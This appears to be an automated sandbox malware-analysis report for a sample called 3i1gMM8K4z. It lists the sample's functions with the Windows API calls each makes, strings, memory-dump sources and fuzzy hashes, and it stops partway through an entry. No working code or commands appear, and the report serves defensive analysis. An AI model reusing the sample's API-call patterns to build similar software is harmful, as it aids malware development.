                                                                                                                            • Opcode Fuzzy Hash: bd4c49df742902bd1a4c81879b5c0e86d9ac0e84342a6c31abf43c5ac4bedca4
                                                                                                                            • Instruction Fuzzy Hash: DF5172B1E04258AFDF259F65DC85A9EBBB9EF48300F10049EF609A3281DB755E80DF58
                                                                                                                            Function 00F0470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2782032738-0
                                                                                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                            • Instruction ID: 6f47416bff1b19eb6b73c92d042da8d3af7c8d295c3209754dd081a74c8c4ced
                                                                                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                            • Instruction Fuzzy Hash: B541D5F5E007469BDF188E69C8809AE77A6AF85360B24C53DEA15C76C0D774FD40BB40
                                                                                                                            Function 00EE44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00EE44CF
                                                                                                                              • Part of subcall function 00EE407C: _memset.LIBCMT ref: 00EE40FC
                                                                                                                              • Part of subcall function 00EE407C: _wcscpy.LIBCMT ref: 00EE4150
                                                                                                                              • Part of subcall function 00EE407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EE4160
                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00EE4524
                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EE4533
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F1D4B9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1378193009-0
                                                                                                                            • Opcode ID: 391e3d760bc2c827c027f1b1fa262ebc5822326077912054760bca049ae809ab
                                                                                                                            • Instruction ID: 7da4096c5a633bbd06015c477251b4f4275be11325dbe89436cf24c5ebdc4c8a
                                                                                                                            • Opcode Fuzzy Hash: 391e3d760bc2c827c027f1b1fa262ebc5822326077912054760bca049ae809ab
                                                                                                                            • Instruction Fuzzy Hash: 9A21D7B1904788AFE732DB24DC55BE7BBFC9F05318F04049DE69E66281C3742A88EB51
                                                                                                                            Function 00EE7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F1EA39
                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00F1EA83
                                                                                                                              • Part of subcall function 00EE4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE4743,?,?,00EE37AE,?), ref: 00EE4770
                                                                                                                              • Part of subcall function 00F00791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F007B0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                            • String ID: X
                                                                                                                            • API String ID: 3777226403-3081909835
                                                                                                                            • Opcode ID: 9db5e3c1d3cead324951d0734f82582c999b34a7775e48dca10745d79e36121f
                                                                                                                            • Instruction ID: 91b9bc2a630325d0e4a63ae2986c1f1f269d4d2f2bcdb44ff7bd7fe571590b31
                                                                                                                            • Opcode Fuzzy Hash: 9db5e3c1d3cead324951d0734f82582c999b34a7775e48dca10745d79e36121f
                                                                                                                            • Instruction Fuzzy Hash: 8521C670A0028C9BDF419F94DC45BEE7BF9AF49710F004019E548F7241DBB859899FA1
                                                                                                                            Function 00F48D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock_memmove
                                                                                                                            • String ID: EA06
                                                                                                                            • API String ID: 1988441806-3962188686
                                                                                                                            • Opcode ID: f0ab55b3ca402d12f1d24723354217d45de6e5495e6dfc64564e904c5b22669c
                                                                                                                            • Instruction ID: 4c380f69228651a9cc167196fc936431d6ef10dec9356ffd75fdceb4020ed2dc
                                                                                                                            • Opcode Fuzzy Hash: f0ab55b3ca402d12f1d24723354217d45de6e5495e6dfc64564e904c5b22669c
                                                                                                                            • Instruction Fuzzy Hash: BB01B972D042187EDB18CAA8CC56EFE7BFCDB15711F00459AF552D21C1E9B9E604AB60
                                                                                                                            Function 01440378 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 014403BD
                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 014403DC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CreateExit
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 126409537-2746444292
                                                                                                                            • Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                                                                            • Instruction ID: 514e93b3cc315a46028a8553605f49a6130bce150a25343156654dc426cb7760
                                                                                                                            • Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                                                                            • Instruction Fuzzy Hash: D0F0EC7694424CABEB60EFE0CC49FEE7778BF04701F408509FB1A9A184DA7496588B61
                                                                                                                            Function 00F498E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00F498F8
                                                                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F4990F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                            • String ID: aut
                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                            • Opcode ID: cabd2ae00dcd3bca8ff4a17ca7aac14123c4c85fbb174fa236b7eaa5a1f9414f
                                                                                                                            • Instruction ID: 75e4355058ab6f36e55727ef93317c427cd9e34d15221c30963c97559eaaad8a
                                                                                                                            • Opcode Fuzzy Hash: cabd2ae00dcd3bca8ff4a17ca7aac14123c4c85fbb174fa236b7eaa5a1f9414f
                                                                                                                            • Instruction Fuzzy Hash: 5CD05E7958030DABDB509BA0EC0EF9A773CE704704F0002B1FA64910A1EAB0959D9FA1
                                                                                                                            Function 00F5CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fa2923d8f3dea30d4e0c69aa3ea2a2bf995390a3a25d7730451b92f29f4adb3b
                                                                                                                            • Instruction ID: de4a63f8f57558b5cd685c524cb1f66e3f4b02dca318e212ee6f2a898fc87a41
                                                                                                                            • Opcode Fuzzy Hash: fa2923d8f3dea30d4e0c69aa3ea2a2bf995390a3a25d7730451b92f29f4adb3b
                                                                                                                            • Instruction Fuzzy Hash: 4EF15B71A083449FC714DF29C880A6ABBE5FF88314F14892DF99A9B352D734E945CF92
                                                                                                                            Function 00EEF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F00162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F00193
                                                                                                                              • Part of subcall function 00F00162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F0019B
                                                                                                                              • Part of subcall function 00F00162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F001A6
                                                                                                                              • Part of subcall function 00F00162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F001B1
                                                                                                                              • Part of subcall function 00F00162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F001B9
                                                                                                                              • Part of subcall function 00F00162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F001C1
                                                                                                                              • Part of subcall function 00EF60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EEF930), ref: 00EF6154
                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EEF9CD
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00EEFA4A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F245C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1986988660-0
                                                                                                                            • Opcode ID: d48cabfa1f428ef1456284eef1224b88e001b6bbaeddd02757f94c91c6123b2f
                                                                                                                            • Instruction ID: 5b3e7d2e08b89e089baffa59ea852b87bf8493a938d5e3e8dcd03c534b2e83c2
                                                                                                                            • Opcode Fuzzy Hash: d48cabfa1f428ef1456284eef1224b88e001b6bbaeddd02757f94c91c6123b2f
                                                                                                                            • Instruction Fuzzy Hash: 0B81CEF0905B4CDFCB84DF79A8606187BE5FB8EB06750812AD819DB272EB704488BF11
                                                                                                                            Function 00EE434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00EE4370
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EE4415
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EE4432
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconNotifyShell_$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1505330794-0
                                                                                                                            • Opcode ID: b8aeeefd36895cf108e1f7ba599eb73cbc909f3c881c6f1ceaaa53b618c949a1
                                                                                                                            • Instruction ID: a490420b9edfe44ae9d15c5d45b8de7383f2548991a3ef566c1ce5cb6ab72280
                                                                                                                            • Opcode Fuzzy Hash: b8aeeefd36895cf108e1f7ba599eb73cbc909f3c881c6f1ceaaa53b618c949a1
                                                                                                                            • Instruction Fuzzy Hash: 6631C1F05047459FC721EF25D88479BBBF8FB49708F00092EF69A92291E770A948DB52
                                                                                                                            Function 00F0571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __FF_MSGBANNER.LIBCMT ref: 00F05733
                                                                                                                              • Part of subcall function 00F0A16B: __NMSG_WRITE.LIBCMT ref: 00F0A192
                                                                                                                              • Part of subcall function 00F0A16B: __NMSG_WRITE.LIBCMT ref: 00F0A19C
                                                                                                                            • __NMSG_WRITE.LIBCMT ref: 00F0573A
                                                                                                                              • Part of subcall function 00F0A1C8: GetModuleFileNameW.KERNEL32(00000000,00FA33BA,00000104,?,00000001,00000000), ref: 00F0A25A
                                                                                                                              • Part of subcall function 00F0A1C8: ___crtMessageBoxW.LIBCMT ref: 00F0A308
                                                                                                                              • Part of subcall function 00F0309F: ___crtCorExitProcess.LIBCMT ref: 00F030A5
                                                                                                                              • Part of subcall function 00F0309F: ExitProcess.KERNEL32 ref: 00F030AE
                                                                                                                              • Part of subcall function 00F08B28: __getptd_noexit.LIBCMT ref: 00F08B28
                                                                                                                            • RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00F00DD3,?), ref: 00F0575F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1372826849-0
                                                                                                                            • Opcode ID: fe95cfbe3aa9053e3fd68cb93c5321578ea5f9ad35574a28194befe6964d34ed
                                                                                                                            • Instruction ID: d1793064843378818a15b8d8c29048edb49a3ef01c97b085fd2a2f3c846fafc7
                                                                                                                            • Opcode Fuzzy Hash: fe95cfbe3aa9053e3fd68cb93c5321578ea5f9ad35574a28194befe6964d34ed
                                                                                                                            • Instruction Fuzzy Hash: 9601B176640B0ADADA102778EC82B6F77889B82BB1F500536F805DA1C1DEF89C017E61
                                                                                                                            Function 00F498A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F49548,?,?,?,?,?,00000004), ref: 00F498BB
                                                                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F49548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F498D1
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00F49548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F498D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3397143404-0
                                                                                                                            • Opcode ID: 5f8c5e1954a2adb2806d5049622ecbf742181edf122e9fc38db957d399176abf
                                                                                                                            • Instruction ID: fa708d4468c397e2c08676b246107217c3feb7f034f488548efc45def75c3543
                                                                                                                            • Opcode Fuzzy Hash: 5f8c5e1954a2adb2806d5049622ecbf742181edf122e9fc38db957d399176abf
                                                                                                                            • Instruction Fuzzy Hash: 6CE08632241218B7D7211B54FC0AFCA7F59AB067B0F104220FB24690E087F11515A798
                                                                                                                            Function 00F48D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 00F48D1B
                                                                                                                              • Part of subcall function 00F02D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00F09A24), ref: 00F02D69
                                                                                                                              • Part of subcall function 00F02D55: GetLastError.KERNEL32(00000000,?,00F09A24), ref: 00F02D7B
                                                                                                                            • _free.LIBCMT ref: 00F48D2C
                                                                                                                            • _free.LIBCMT ref: 00F48D3E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: bee81b5e5e3cd578fde5cdb6867b4e945c3d38cd80081bd24aec34fd9e465f35
                                                                                                                            • Instruction ID: c720a0bc9d863eb5c1f48f59a03d83235a55dc065651d2243e1f411ece1928a0
                                                                                                                            • Opcode Fuzzy Hash: bee81b5e5e3cd578fde5cdb6867b4e945c3d38cd80081bd24aec34fd9e465f35
                                                                                                                            • Instruction Fuzzy Hash: CFE012A1E0361146CF64A5B8BD44A9767EC4F5C7A2754091DBC0DD71C6CE68FC83B134
                                                                                                                            Function 00EEA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CALL
                                                                                                                            • API String ID: 0-4196123274
                                                                                                                            • Opcode ID: cca8ba5c4a2308a9fe6efbb4b0495a0fe481d99777616e3a01bb2f51fbab88d5
                                                                                                                            • Instruction ID: 32e0927115fca1dcd81f0ddce90f98ca802aaa81a7483493d85b42d4d2cd666d
                                                                                                                            • Opcode Fuzzy Hash: cca8ba5c4a2308a9fe6efbb4b0495a0fe481d99777616e3a01bb2f51fbab88d5
                                                                                                                            • Instruction Fuzzy Hash: CE227C70508385DFC724DF15C490B6AB7E1BF84304F19996DE88AAB362DB35EC85DB82
                                                                                                                            Function 00EE4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: EA06
                                                                                                                            • API String ID: 4104443479-3962188686
                                                                                                                            • Opcode ID: 4ab294760f2c548670d06509f707ade76e86b5a72f2ed4a3fc11390276e8fe85
                                                                                                                            • Instruction ID: afad0c59b6b54fc8500625da94b3ca60d2c7c8dcc868d8874f35cefdd62f56db
                                                                                                                            • Opcode Fuzzy Hash: 4ab294760f2c548670d06509f707ade76e86b5a72f2ed4a3fc11390276e8fe85
                                                                                                                            • Instruction Fuzzy Hash: B9415AA2A041DC5BDF229B669C617FE7FF29B45304F286465EC82BB3C2D6209D44D3A1
                                                                                                                            Function 00EE7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
